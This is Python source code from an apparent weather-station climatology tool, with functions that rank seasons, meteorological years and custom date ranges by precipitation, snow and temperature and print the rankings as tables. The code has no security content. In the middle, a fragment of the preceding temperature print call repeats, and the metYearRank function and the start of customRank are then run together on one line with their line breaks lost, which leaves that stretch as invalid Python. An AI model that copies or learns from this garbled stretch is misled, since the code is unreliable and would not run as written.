                        SEASON_snowDAYS[x].year if SEASON_snowDAYS[x].number > 0 else "",SEASON_snowDAYS[x].number if SEASON_snowDAYS[x].number > 0 else ""))
                    ranked_i.append(i);ranked_j.append(j);ranked_k.append(k);ranked_l.append(l);ranked_m.append(m);ranked_n.append(n)
                else:
                    if i not in ranked_i and i <= qty: ranked_i.append(i)
                    if j not in ranked_j and j <= qty: ranked_j.append(j)
                    if k not in ranked_k and k <= qty: ranked_k.append(k)
                    if l not in ranked_l and l <= qty: ranked_l.append(l)
                    if m not in ranked_m and m <= qty: ranked_m.append(m)
                    if n not in ranked_n and n <= qty: ranked_n.append(n)
                    # Advance a column's rank only when its value changed
                    # (tied values share one rank).
                    if SEASON_prcp[x].number != SEASON_prcp[x-1].number: i += 1
                    if SEASON_prcp_asc[x].number != SEASON_prcp_asc[x-1].number: j += 1
                    if SEASON_prcpDAYS[x].number != SEASON_prcpDAYS[x-1].number: k += 1
                    if SEASON_prcpDAYS_asc[x].number != SEASON_prcpDAYS_asc[x-1].number: l += 1
                    if SEASON_snow[x].number != SEASON_snow[x-1].number: m += 1
                    if SEASON_snowDAYS[x].number != SEASON_snowDAYS[x-1].number: n += 1
                    # Hitting zero ends a descending column early.
                    if SEASON_prcp[x].number == 0: i = qty + 1
                    if SEASON_prcpDAYS[x].number == 0: k = qty + 1
                    if SEASON_snow[x].number == 0: m = qty + 1
                    if SEASON_snowDAYS[x].number == 0: n = qty + 1
                    if i <= qty or j <= qty or k <= qty or l <= qty or m <= qty or n <= qty:
                        print(" {:2}{} {:4} {:>6} | {:2}{} {:4} {:>6} | {:2}{} {:4} {:>3} | {:2}{} {:4} {:>3} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>3} ".format(
                            i if i not in ranked_i and i <= qty else "","." if i not in ranked_i and i <= qty else " ",
                            SEASON_prcp[x].year if i <= qty else "","{:.2f}".format(SEASON_prcp[x].number) if i <= qty else "",
                            j if j not in ranked_j and j <= qty else "","." if j not in ranked_j and j <= qty else " ",
                            SEASON_prcp_asc[x].year if j <= qty else "","{:.2f}".format(SEASON_prcp_asc[x].number) if j <= qty else "",
                            k if k not in ranked_k and k <= qty else "","." if k not in ranked_k and k <= qty else " ",
                            SEASON_prcpDAYS[x].year if k <= qty else "",SEASON_prcpDAYS[x].number if k <= qty else "",
                            l if l not in ranked_l and l <= qty else "","." if l not in ranked_l and l <= qty else " ",
                            SEASON_prcpDAYS_asc[x].year if l <= qty else "",SEASON_prcpDAYS_asc[x].number if l <= qty else "",
                            m if m not in ranked_m and m <= qty else "","." if m not in ranked_m and m <= qty else " ",
                            SEASON_snow[x].year if m <= qty else "","{:.1f}".format(SEASON_snow[x].number) if m <= qty else "",
                            n if n not in ranked_n and n <= qty else "","." if n not in ranked_n and n <= qty else " ",
                            SEASON_snowDAYS[x].year if n <= qty else "",SEASON_snowDAYS[x].number if n <= qty else ""))
                # Stop once every column has printed its top `qty` ranks.
                if i > qty and j > qty and k > qty and l > qty and m > qty and n > qty:
                    break
        if attribute == "temp":
            print("{:^111}".format("Meteorological {} Ranked Temperatures".format(season.capitalize())))
            print("{:^111}".format("{}, {}".format(metclmt["station"],metclmt["station_name"])))
            print("{:^111}".format("Seasons with >= {} day(s) of data".format(excludeseason+1)))
            print("{:-^111}".format(""))
            print("{:^36}|{:^37}|{:^36}".format("AVG TEMP","TMAX","TMIN"))
            print("{:-^36}|{:-^37}|{:-^36}".format("","",""))
            print("{:^17}|{:^18}|{:^18}|{:^18}|{:^18}|{:^17}".format("Warmest","Coolest","Warmest","Coolest","Warmest","Coolest"))
            print("{:-^17}|{:-^18}|{:-^18}|{:-^18}|{:-^18}|{:-^17}".format("","","","","",""))
            i = 1; j = 1; k = 1; l = 1; m = 1; n = 1
            ranked_i = []; ranked_j = []; ranked_k = []; ranked_l = []; ranked_m = []; ranked_n = []
            for x in range(len(SEASON_tmax)):
                if x == 0:
                    print("{:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5}".format(
                        1,".",SEASON_tavg[x].year,"{:.1f}".format(SEASON_tavg[x].number),
                        1,".",SEASON_tavg_asc[x].year,"{:.1f}".format(SEASON_tavg_asc[x].number),
                        1,".",SEASON_tmax[x].year,"{:.1f}".format(SEASON_tmax[x].number),
                        1,".",SEASON_tmax_asc[x].year,"{:.1f}".format(SEASON_tmax_asc[x].number),
                        1,".",SEASON_tmin[x].year,"{:.1f}".format(SEASON_tmin[x].number),
                        1,".",SEASON_tmin_asc[x].year,"{:.1f}".format(SEASON_tmin_asc[x].number)))
                    ranked_i.append(i); ranked_j.append(j); ranked_k.append(k); ranked_l.append(l); ranked_m.append(m); ranked_n.append(n)
                else:
                    if i not in ranked_i and i <= qty: ranked_i.append(i)
                    if j not in ranked_j and j <= qty: ranked_j.append(j)
                    if k not in ranked_k and k <= qty: ranked_k.append(k)
                    if l not in ranked_l and l <= qty: ranked_l.append(l)
                    if m not in ranked_m and m <= qty: ranked_m.append(m)
                    if n not in ranked_n and n <= qty: ranked_n.append(n)
                    if SEASON_tavg[x].number != SEASON_tavg[x-1].number: i += 1
                    if SEASON_tavg_asc[x].number != SEASON_tavg_asc[x-1].number: j += 1
                    if SEASON_tmax[x].number != SEASON_tmax[x-1].number: k += 1
                    if SEASON_tmax_asc[x].number != SEASON_tmax_asc[x-1].number: l += 1
                    if SEASON_tmin[x].number != SEASON_tmin[x-1].number: m += 1
                    if SEASON_tmin_asc[x].number != SEASON_tmin_asc[x-1].number: n += 1
                    if i <= qty or j <= qty or k <= qty or l <= qty or m <= qty or n <= qty:
                        print("{:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5}".format(
                            i if i not in ranked_i and i <= qty else "","." if i not in ranked_i and i <= qty else " ",
                            SEASON_tavg[x].year if i <= qty else "","{:.1f}".format(SEASON_tavg[x].number) if i <= qty else "",
                            j if j not in ranked_j and j <= qty else "","." if j not in ranked_j and j <= qty else " ",
                            SEASON_tavg_asc[x].year if j <= qty else "","{:.1f}".format(SEASON_tavg_asc[x].number) if j <= qty else "",
                            k if k not in ranked_k and k <= qty else "","." if k not in ranked_k and k <= qty else " ",
                            SEASON_tmax[x].year if k <= qty else "","{:.1f}".format(SEASON_tmax[x].number) if k <= qty else "",
                            l if l not in ranked_l and l <= qty else "","." if l not in ranked_l and l <= qty else " ",
                            SEASON_tmax_asc[x].year if l <= qty else "","{:.1f}".format(SEASON_tmax_asc[x].number) if l <= qty else "",
                            m if m not in ranked_m and m <= qty else "","." if m not in ranked_m and m <= qty else " ",
                            SEASON_tmin[x].year if m <= qty else "","{:.1f}".format(SEASON_tmin[x].number) if m <= qty else "",
                            n if n not in ranked_n and n <= qty else "","." if n not in ranked_n and n <= qty else " ",
                            SEASON_tmin_asc[x].year if n <= qty else "","{:.1f}".format(SEASON_tmin_asc[x].number) if n <= qty else ""))
                if i > qty and j > qty and k > qty and l > qty and m > qty and n > qty:
                    break
        print("")
if l not in ranked_l and l <= qty else " ", SEASON_tmax_asc[x].year if l <= qty else "","{:.1f}".format(SEASON_tmax_asc[x].number) if l <= qty else "", m if m not in ranked_m and m <= qty else "","." if m not in ranked_m and m <= qty else " ", SEASON_tmin[x].year if m <= qty else "","{:.1f}".format(SEASON_tmin[x].number) if m <= qty else "", n if n not in ranked_n and n <= qty else "","." if n not in ranked_n and n <= qty else " ", SEASON_tmin_asc[x].year if n <= qty else "","{:.1f}".format(SEASON_tmin_asc[x].number) if n <= qty else "")) if i > qty and j > qty and k > qty and l > qty and m > qty and n > qty: break print("") def metYearRank(attribute,qty,**kwargs): """Returns a list of rankings (maxs and mins) for all meteorological years (March to February) on record. The attribute ("prcp" or "temp") must be in string format. The quantity, denoting how many rankings you desire, must be an integer. metYearRank(attribute,quantity) EXAMPLE: metYearRank("rain",12) -> Returns the "Top 12" Precip-based Rankings for all Meteorological Years on record """ class month_attr: def __init__(self,y,number): self.year = y self.number = number if attribute not in ["temp","temps","temperature","temperatures","tmax","tmin","tavg","prcp","precip","rain","snow"]: return print("* OOPS! Attribute must be 'temp' or 'prcp'. Try again!") if type(qty) != int or qty > 50 or qty < 5: return print("* SORRY! 
Ensure desired quantity is an integer in the range [5,50]") if attribute in ["prcp","precip","rain","snow"]: attribute = "prcp" if attribute in ["temp","temps","temperature","temperatures","tmax","tmin","tavg"]: attribute = "temp" YEARS_prcp = [] YEARS_prcp_asc = [] YEARS_prcpDAYS = [] YEARS_prcpDAYS_asc = [] YEARS_snow = [] YEARS_snow_asc = [] YEARS_snowDAYS = [] YEARS_snowDAYS_asc = [] YEARS_tavg = [] YEARS_tmax = [] YEARS_tmin = [] for y in [YR for YR in clmt if type(YR) == int]: try: YEARS_prcp.append(month_attr(y,round(sum(metclmt[y]["prcp"]),2))) YEARS_prcpDAYS.append(month_attr(y,metclmt[y]["prcpDAYS"])) if metclmt[y]["recordqty"] > excludeyear: YEARS_prcp_asc.append(month_attr(y,round(sum(metclmt[y]["prcp"]),2))) YEARS_prcpDAYS_asc.append(month_attr(y,metclmt[y]["prcpDAYS"])) YEARS_snow.append(month_attr(y,round(sum(metclmt[y]["snow"]),1))) if metclmt[y]["recordqty"] > excludeyear: YEARS_snow_asc.append(month_attr(y,round(sum(metclmt[y]["snow"]),1))) YEARS_snowDAYS.append(month_attr(y,metclmt[y]["snowDAYS"])) if metclmt[y]["recordqty"] > excludeyear: YEARS_snowDAYS_asc.append(month_attr(y,metclmt[y]["snowDAYS"])) except: pass try: if len(metclmt[y]["tempAVGlist"]) > excludeyear_tavg: YEARS_tavg.append(month_attr(y,round(mean(metclmt[y]["tempAVGlist"]),1))) except: pass try: if len(metclmt[y]["tmax"]) > excludeyear: YEARS_tmax.append(month_attr(y,round(mean(metclmt[y]["tmax"]),1))) except: pass try: if len(metclmt[y]["tmin"]) > excludeyear: YEARS_tmin.append(month_attr(y,round(mean(metclmt[y]["tmin"]),1))) except: pass #YEARS_prcp_asc = YEARS_prcp.copy() YEARS_prcp.sort(key=lambda x:x.number,reverse=True) YEARS_prcp_asc.sort(key=lambda x:x.number) #YEARS_prcpDAYS_asc = YEARS_prcpDAYS.copy() YEARS_prcpDAYS.sort(key=lambda x:x.number,reverse=True) YEARS_prcpDAYS_asc.sort(key=lambda x:x.number) YEARS_snow.sort(key=lambda x:x.number,reverse=True) YEARS_snow_asc.sort(key=lambda x:x.number) YEARS_snowDAYS.sort(key=lambda x:x.number,reverse=True) 
YEARS_snowDAYS_asc.sort(key=lambda x:x.number) YEARS_tavg_asc = YEARS_tavg.copy() YEARS_tavg.sort(key=lambda x:x.number,reverse=True) YEARS_tavg_asc.sort(key=lambda x:x.number) YEARS_tmax_asc = YEARS_tmax.copy() YEARS_tmax.sort(key=lambda x:x.number,reverse=True) YEARS_tmax_asc.sort(key=lambda x:x.number) YEARS_tmin_asc = YEARS_tmin.copy() YEARS_tmin.sort(key=lambda x:x.number,reverse=True) YEARS_tmin_asc.sort(key=lambda x:x.number) if "yearStatsRun" in kwargs and kwargs["yearStatsRun"] == True: prcpaschist = sorted(list(set([x.number for x in YEARS_prcp_asc]))) prcpdeschist = sorted(list(set([x.number for x in YEARS_prcp])),reverse=True) prcpDAYSaschist = sorted(list(set([x.number for x in YEARS_prcpDAYS_asc]))) prcpDAYSdeschist = sorted(list(set([x.number for x in YEARS_prcpDAYS])),reverse=True) snowaschist = sorted(list(set([x.number for x in YEARS_snow_asc]))) snowdeschist = sorted(list(set([x.number for x in YEARS_snow])),reverse=True) snowDAYSaschist = sorted(list(set([x.number for x in YEARS_snowDAYS_asc]))) snowDAYSdeschist = sorted(list(set([x.number for x in YEARS_snowDAYS])),reverse=True) tmaxaschist = sorted(list(set([x.number for x in YEARS_tmax_asc]))) tmaxdeschist = sorted(list(set([x.number for x in YEARS_tmax])),reverse=True) tminaschist = sorted(list(set([x.number for x in YEARS_tmin_asc]))) tmindeschist = sorted(list(set([x.number for x in YEARS_tmin])),reverse=True) tavgaschist = sorted(list(set([x.number for x in YEARS_tavg_asc]))) tavgdeschist = sorted(list(set([x.number for x in YEARS_tavg])),reverse=True) return prcpaschist, prcpdeschist, prcpDAYSaschist, prcpDAYSdeschist, snowaschist, snowdeschist, snowDAYSaschist, snowDAYSdeschist, tmaxaschist, tmaxdeschist, tminaschist, tmindeschist, tavgaschist, tavgdeschist else: print("") if attribute == "prcp": print("{:^103}".format("Meteorological Annual Ranked Precipitation Amounts and Days")) print("{:^103}".format("{}, {}".format(metclmt["station"],metclmt["station_name"]))) 
print("{:^103}".format("Years with >= {} day(s) of data".format(excludeyear+1))) print("{:-^103}".format("")) print("{:^69}|{:^33}".format("Rain","Snow")) print("{:-^69}|{:-^33}".format("","")) print("{:^18}|{:^18}|{:^15}|{:^15}|{:^17}|{:^15}".format("Wettest","Driest","Most Days","Least Days","Snowiest","Most Days")) print("{:-^18}|{:-^18}|{:-^15}|{:-^15}|{:-^17}|{:-^15}".format("","","","","","")) i = 1;j = 1;k = 1;l = 1;m = 1;n = 1 ranked_i = [];ranked_j = [];ranked_k = [];ranked_l = [];ranked_m = [];ranked_n = [] for x in range(min(len(YEARS_prcp),len(YEARS_prcp_asc),len(YEARS_prcpDAYS_asc),len(YEARS_prcpDAYS),len(YEARS_snow),len(YEARS_snowDAYS))): if x == 0: print(" {:2}{} {:4} {:>6} | {:2}{} {:4} {:>6} | {:2}{} {:4} {:>3} | {:2}{} {:4} {:>3} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>3} ".format( 1,".",YEARS_prcp[x].year,"{:.2f}".format(YEARS_prcp[x].number), 1,".",YEARS_prcp_asc[x].year,"{:.2f}".format(YEARS_prcp_asc[x].number), 1,".",YEARS_prcpDAYS[x].year,YEARS_prcpDAYS[x].number, 1,".",YEARS_prcpDAYS_asc[x].year,YEARS_prcpDAYS_asc[x].number, 1 if YEARS_snow[x].number else "","." if YEARS_snow[x].number > 0 else " ", YEARS_snow[x].year if YEARS_snow[x].number > 0 else "","{:.1f}".format(YEARS_snow[x].number) if YEARS_snow[x].number > 0 else "", 1 if YEARS_snowDAYS[x].number > 0 else "","." 
if YEARS_snowDAYS[x].number > 0 else " ", YEARS_snowDAYS[x].year if YEARS_snowDAYS[x].number > 0 else "",YEARS_snowDAYS[x].number if YEARS_snowDAYS[x].number > 0 else "")) ranked_i.append(i);ranked_j.append(j);ranked_k.append(k);ranked_l.append(l);ranked_m.append(m);ranked_n.append(n) else: if i not in ranked_i and i <= qty: ranked_i.append(i) if j not in ranked_j and j <= qty: ranked_j.append(j) if k not in ranked_k and k <= qty: ranked_k.append(k) if l not in ranked_l and l <= qty: ranked_l.append(l) if m not in ranked_m and m <= qty: ranked_m.append(m) if n not in ranked_n and n <= qty: ranked_n.append(n) if YEARS_prcp[x].number != YEARS_prcp[x-1].number: i += 1 if YEARS_prcp_asc[x].number != YEARS_prcp_asc[x-1].number: j += 1 if YEARS_prcpDAYS[x].number != YEARS_prcpDAYS[x-1].number: k += 1 if YEARS_prcpDAYS_asc[x].number != YEARS_prcpDAYS_asc[x-1].number: l += 1 if YEARS_snow[x].number != YEARS_snow[x-1].number: m += 1 if YEARS_snowDAYS[x].number != YEARS_snowDAYS[x-1].number: n += 1 if YEARS_prcp[x].number == 0: i = qty + 1 if YEARS_prcpDAYS[x].number == 0: k = qty + 1 if YEARS_snow[x].number == 0: m = qty + 1 if YEARS_snowDAYS[x].number == 0: n = qty + 1 if i <= qty or j <= qty or k <= qty or l <= qty or m <= qty or n <= qty: print(" {:2}{} {:4} {:>6} | {:2}{} {:4} {:>6} | {:2}{} {:4} {:>3} | {:2}{} {:4} {:>3} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>3} ".format( i if i not in ranked_i and i <= qty else "","." if i not in ranked_i and i <= qty else " ", YEARS_prcp[x].year if i <= qty else "","{:.2f}".format(YEARS_prcp[x].number) if i <= qty else "", j if j not in ranked_j and j <= qty else "","." if j not in ranked_j and j <= qty else " ", YEARS_prcp_asc[x].year if j <= qty else "","{:.2f}".format(YEARS_prcp_asc[x].number) if j <= qty else "", k if k not in ranked_k and k <= qty else "","." 
if k not in ranked_k and k <= qty else " ", YEARS_prcpDAYS[x].year if k <= qty else "",YEARS_prcpDAYS[x].number if k <= qty else "", l if l not in ranked_l and l <= qty else "","." if l not in ranked_l and l <= qty else " ", YEARS_prcpDAYS_asc[x].year if l <= qty else "",YEARS_prcpDAYS_asc[x].number if l <= qty else "", m if m not in ranked_m and m <= qty else "","." if m not in ranked_m and m <= qty else " ", YEARS_snow[x].year if m <= qty else "","{:.1f}".format(YEARS_snow[x].number) if m <= qty else "", n if n not in ranked_n and n <= qty else "","." if n not in ranked_n and n <= qty else " ", YEARS_snowDAYS[x].year if n <= qty else "",YEARS_snowDAYS[x].number if n <= qty else "")) if i > qty and j > qty and k > qty and l > qty and m > qty and n > qty: break if attribute == "temp": print("{:^111}".format("Meteorological Annual Ranked Temperatures")) print("{:^111}".format("{}, {}".format(metclmt["station"],metclmt["station_name"]))) print("{:^111}".format("Years with >= {} day(s) of data".format(excludeyear+1))) print("{:-^111}".format("")) print("{:^36}|{:^37}|{:^36}".format("AVG TEMP","TMAX","TMIN")) print("{:-^36}|{:-^37}|{:-^36}".format("","","")) print("{:^17}|{:^18}|{:^18}|{:^18}|{:^18}|{:^17}".format("Warmest","Coolest","Warmest","Coolest","Warmest","Coolest")) print("{:-^17}|{:-^18}|{:-^18}|{:-^18}|{:-^18}|{:-^17}".format("","","","","","")) i = 1; j = 1; k = 1; l = 1; m = 1; n = 1 ranked_i = []; ranked_j = []; ranked_k = []; ranked_l = []; ranked_m = []; ranked_n = [] for x in range(len(YEARS_tmax)): if x == 0: print("{:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5}".format( 1,".",YEARS_tavg[x].year,"{:.1f}".format(YEARS_tavg[x].number), 1,".",YEARS_tavg_asc[x].year,"{:.1f}".format(YEARS_tavg_asc[x].number), 1,".",YEARS_tmax[x].year,"{:.1f}".format(YEARS_tmax[x].number), 1,".",YEARS_tmax_asc[x].year,"{:.1f}".format(YEARS_tmax_asc[x].number), 
1,".",YEARS_tmin[x].year,"{:.1f}".format(YEARS_tmin[x].number), 1,".",YEARS_tmin_asc[x].year,"{:.1f}".format(YEARS_tmin_asc[x].number))) ranked_i.append(i); ranked_j.append(j); ranked_k.append(k); ranked_l.append(l); ranked_m.append(m); ranked_n.append(n) else: if i not in ranked_i and i <= qty: ranked_i.append(i) if j not in ranked_j and j <= qty: ranked_j.append(j) if k not in ranked_k and k <= qty: ranked_k.append(k) if l not in ranked_l and l <= qty: ranked_l.append(l) if m not in ranked_m and m <= qty: ranked_m.append(m) if n not in ranked_n and n <= qty: ranked_n.append(n) if YEARS_tavg[x].number != YEARS_tavg[x-1].number: i += 1 if YEARS_tavg_asc[x].number != YEARS_tavg_asc[x-1].number: j += 1 if YEARS_tmax[x].number != YEARS_tmax[x-1].number: k += 1 if YEARS_tmax_asc[x].number != YEARS_tmax_asc[x-1].number: l += 1 if YEARS_tmin[x].number != YEARS_tmin[x-1].number: m += 1 if YEARS_tmin_asc[x].number != YEARS_tmin_asc[x-1].number: n += 1 if i <= qty or j <= qty or k <= qty or l <= qty or m <= qty or n <= qty: print("{:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5} | {:2}{} {:4} {:>5}".format( i if i not in ranked_i and i <= qty else "","." if i not in ranked_i and i <= qty else " ", YEARS_tavg[x].year if i <= qty else "","{:.1f}".format(YEARS_tavg[x].number) if i <= qty else "", j if j not in ranked_j and j <= qty else "","." if j not in ranked_j and j <= qty else " ", YEARS_tavg_asc[x].year if j <= qty else "","{:.1f}".format(YEARS_tavg_asc[x].number) if j <= qty else "", k if k not in ranked_k and k <= qty else "","." if k not in ranked_k and k <= qty else " ", YEARS_tmax[x].year if k <= qty else "","{:.1f}".format(YEARS_tmax[x].number) if k <= qty else "", l if l not in ranked_l and l <= qty else "","." if l not in ranked_l and l <= qty else " ", YEARS_tmax_asc[x].year if l <= qty else "","{:.1f}".format(YEARS_tmax_asc[x].number) if l <= qty else "", m if m not in ranked_m and m <= qty else "","." 
                          if m not in ranked_m and m <= qty else " ",
                          YEARS_tmin[x].year if m <= qty else "","{:.1f}".format(YEARS_tmin[x].number) if m <= qty else "",
                          n if n not in ranked_n and n <= qty else "","." if n not in ranked_n and n <= qty else " ",
                          YEARS_tmin_asc[x].year if n <= qty else "","{:.1f}".format(YEARS_tmin_asc[x].number) if n <= qty else ""))
                # Stop once all six rank counters have exhausted the requested quantity.
                if i > qty and j > qty and k > qty and l > qty and m > qty and n > qty: break
    print("")

def customRank(attribute: str, qty: int, m1: int, d1: int, *date2: int, **kwargs):
    """Rank precipitation or temperature stats for a custom slice of the calendar, per year.

    Note that the order of the passed arguments differs from the similar ranking
    functions. The attribute ("prcp" or "temp") must be a string; the quantity
    (how many rankings you want), M1 (month), D1 (day), and the optional M2/D2
    must be integers. If M2 and D2 are not given, 12-31 is used as the final
    date of the custom period. If the end day occurs before the start day in
    the calendar year, the end day of the following year is used.

    customRank(attribute,quantity,M1,D1,*[M2,D2])

    OPT *args: M2,D2 --> optional ending month and day of the period

    EXAMPLE: customRank("temp",10,11,1) -> "Top 10" temperature-based rankings
             for the custom period of Nov 1 thru Dec 31.
    EXAMPLE: customRank("prcp",10,9,1,3,31) -> "Top 10" precipitation-based
             rankings for the frame of Sept 1 thru Mar 31.
    """
    # NOTE(review): depends on module-level state — clmt, ignoreflags, excludeweek,
    # excludemonth, excludeyear, excludecustom, plus datetime/calendar/mean imports.

    # Lightweight record pairing a period's parent year with one numeric stat.
    class e_attr:
        def __init__(self,y,number):
            self.year = y
            self.number = number

    # --- Input validation -------------------------------------------------
    if len(clmt) == 0: return print("* OOPS! Run the clmtAnalyze function first.")
    valid_yrs = [x for x in clmt.keys() if type(x) == int]
    valid_yrs.sort()
    if any(type(x) != int for x in [m1,d1]): return print("*** OOPS! Ensure that only integers are entered ***")
    if len(date2) == 0: pass
    elif len(date2) != 2: return print("*** OOPS! For the 2nd (optional) date, ensure only a Month and Date are entered ***")
    elif any(type(x) != int for x in [date2[0],date2[1]]): return print("*** OOPS! Ensure that only integers are entered ***")
    if attribute not in ["temp","temps","temperature","temperatures","tmax","tmin","tavg","prcp","precip","rain","snow"]: return print("* OOPS! Attribute must be 'temp' or 'prcp'. Try again!")
    if type(qty) != int or qty > 50 or qty < 5: return print("* SORRY! Ensure desired quantity is an integer in the range [5,50]")
    # Normalize attribute aliases to the two canonical modes.
    if attribute in ["prcp","precip","rain","snow"]: attribute = "prcp"
    if attribute in ["temp","temps","temperature","temperatures","tmax","tmin","tavg"]: attribute = "temp"
    if len(date2) == 2:
        m2 = date2[0]
        d2 = date2[1]
    else:
        # Default end of the period: Dec 31.
        m2 = 12
        d2 = 31
    if m2 == m1:
        if d2 == d1: return print("*** OOPS! Ensure different dates! ***")
    # Feb 29 is demoted to Feb 28 so every year can construct the boundary date.
    if m1 == 2 and d1 == 29: d1 = 28
    if m2 == 2 and d2 == 29: d2 = 28

    # Determine total length of period (used for exclusion calculation)
    s = datetime.date(1900,m1,d1)
    test = datetime.date(1900,m2,d2)
    if test > s: e = test
    else: e = datetime.date(1901,m2,d2)    # period wraps into the following year
    timelength = (e - s).days + 1
    # EXCLD: minimum day-count a year's period must exceed to count in the
    # "_asc" (data-sufficient) rankings; scales with the period's length.
    if timelength <= 5: EXCLD = timelength-1
    elif timelength == 6: EXCLD = 4
    elif timelength == 7: EXCLD = excludeweek
    elif timelength == 8: EXCLD = excludeweek
    elif timelength in [28,29,30,31]: EXCLD = excludemonth
    elif timelength >= 350: EXCLD = excludeyear
    else: EXCLD = round(excludecustom * timelength)

    # NOTE(review): `e` is reused here — the datetime above is discarded and the
    # name now holds the per-year stats accumulator.
    e = {}   # Will hold the date-to-date (represented by a parent year) stats
    for YYYY in valid_yrs:
        startday = datetime.date(YYYY,m1,d1)
        incr_day = startday
        if m2 < m1: endday = datetime.date(YYYY+1,m2,d2)    # if end month is less, the results will bleed into the following year
        elif m2 == m1:    # Deals with if the months of the dates are exactly the same
            if d2 < d1: endday = datetime.date(YYYY+1,m2,d2)    # like above, if month is the same, but date is less, results bleed into following year
            else: endday = datetime.date(YYYY,m2,d2)    # OTHERWISE, it is assumed the same year
        else: endday = datetime.date(YYYY,m2,d2)    # If month2 is > than month 1, the active year will be used
        if endday.year > max(valid_yrs): break    # period would extend beyond the record
        #if YYYY not in e:
        e[YYYY] = {"recordqty":0, "prcp":[],"prcpDAYS":0,"snow":[],"snowDAYS":0, "tempAVGlist":[],"tmax":[],"tmin":[]}
        # Walk every calendar day of the period, accumulating valid observations.
        # Values of "9999"/"-9999"/"" are treated as missing; a "T" measurement
        # flag counts as a trace day for the day-count stats.
        while incr_day <= endday:
            y = incr_day.year; m = incr_day.month; d = incr_day.day
            if y in clmt and m in clmt[y] and d in clmt[y][m]:
                e[YYYY]["recordqty"] += 1
                # PRCP
                if clmt[y][m][d].prcpQ in ignoreflags and clmt[y][m][d].prcp not in ["9999","-9999",""]:
                    if float(clmt[y][m][d].prcp) > 0: e[YYYY]["prcp"].append(round(float(clmt[y][m][d].prcp),2))
                    if float(clmt[y][m][d].prcp) > 0 or clmt[y][m][d].prcpM == "T": e[YYYY]["prcpDAYS"] += 1
                if clmt[y][m][d].prcpQ in ignoreflags and clmt[y][m][d].prcp == "" and clmt[y][m][d].prcpM == "T": e[YYYY]["prcpDAYS"] += 1
                # SNOW
                if clmt[y][m][d].snowQ in ignoreflags and clmt[y][m][d].snow not in ["9999","-9999",""]:
                    if float(clmt[y][m][d].snow) > 0: e[YYYY]["snow"].append(round(float(clmt[y][m][d].snow),2))
                    if float(clmt[y][m][d].snow) > 0 or clmt[y][m][d].snowM == "T": e[YYYY]["snowDAYS"] += 1
                if clmt[y][m][d].snowQ in ignoreflags and clmt[y][m][d].snow == "" and clmt[y][m][d].snowM == "T": e[YYYY]["snowDAYS"] += 1
                # TAVG — only when both tmax and tmin are valid and consistent.
                if clmt[y][m][d].tmaxQ in ignoreflags and clmt[y][m][d].tmax not in ["9999","-9999",""] and clmt[y][m][d].tminQ in ignoreflags and clmt[y][m][d].tmin not in ["9999","-9999",""] and int(clmt[y][m][d].tmax) >= int(clmt[y][m][d].tmin):
                    e[YYYY]["tempAVGlist"].append(int(clmt[y][m][d].tmax))
                    e[YYYY]["tempAVGlist"].append(int(clmt[y][m][d].tmin))
                # TMAX
                if clmt[y][m][d].tmaxQ in ignoreflags and clmt[y][m][d].tmax not in ["9999","-9999",""]:
                    if clmt[y][m][d].tmin != "" and int(clmt[y][m][d].tmax) >= int(clmt[y][m][d].tmin): e[YYYY]["tmax"].append(int(clmt[y][m][d].tmax))
                # TMIN
                if clmt[y][m][d].tminQ in ignoreflags and clmt[y][m][d].tmin not in ["9999","-9999",""]:
                    if clmt[y][m][d].tmax != "" and int(clmt[y][m][d].tmin) <= int(clmt[y][m][d].tmax): e[YYYY]["tmin"].append(int(clmt[y][m][d].tmin))
            incr_day += datetime.timedelta(days=1)   # GO ON TO TEST NEXT DAY

    # Collapse each year's accumulator into rankable e_attr records.
    # Plain lists hold every year; the *_asc lists only hold years that passed
    # the EXCLD data-sufficiency threshold (used for the "least/driest" side).
    E_prcp = []
    E_prcp_asc = []
    E_prcpDAYS = []
    E_prcpDAYS_asc = []
    E_snow = []
    E_snow_asc = []
    E_snowDAYS = []
    E_snowDAYS_asc = []
    E_tavg = []
    E_tmax = []
    E_tmin = []
    for YYYY in e:
        # NOTE(review): bare except — years with malformed data are silently
        # skipped (intentional best-effort); consider narrowing the exception.
        try:
            E_prcp.append(e_attr(YYYY,round(sum(e[YYYY]["prcp"]),2)))
            E_prcpDAYS.append(e_attr(YYYY,e[YYYY]["prcpDAYS"]))
            if e[YYYY]["recordqty"] > EXCLD:
                E_prcp_asc.append(e_attr(YYYY,round(sum(e[YYYY]["prcp"]),2)))
                E_prcpDAYS_asc.append(e_attr(YYYY,e[YYYY]["prcpDAYS"]))
            E_snow.append(e_attr(YYYY,round(sum(e[YYYY]["snow"]),1)))
            if e[YYYY]["recordqty"] > EXCLD: E_snow_asc.append(e_attr(YYYY,round(sum(e[YYYY]["snow"]),1)))
            E_snowDAYS.append(e_attr(YYYY,e[YYYY]["snowDAYS"]))
            if e[YYYY]["recordqty"] > EXCLD: E_snowDAYS_asc.append(e_attr(YYYY,e[YYYY]["snowDAYS"]))
        except: pass
        try:
            # tempAVGlist holds two entries (tmax+tmin) per valid day, hence * 2.
            if len(e[YYYY]["tempAVGlist"]) > EXCLD * 2: E_tavg.append(e_attr(YYYY,round(mean(e[YYYY]["tempAVGlist"]),1)))
        except: pass
        try:
            if len(e[YYYY]["tmax"]) > EXCLD: E_tmax.append(e_attr(YYYY,round(mean(e[YYYY]["tmax"]),1)))
        except: pass
        try:
            if len(e[YYYY]["tmin"]) > EXCLD: E_tmin.append(e_attr(YYYY,round(mean(e[YYYY]["tmin"]),1)))
        except: pass

    # Sort each list into ranking order and remember every list's length so the
    # print loop below can stop at the shortest one.
    E_LENGTHS_OF_ALL = []
    #E_prcp_asc = E_prcp.copy()
    E_prcp.sort(key=lambda x:x.number,reverse=True); E_LENGTHS_OF_ALL.append(len(E_prcp))
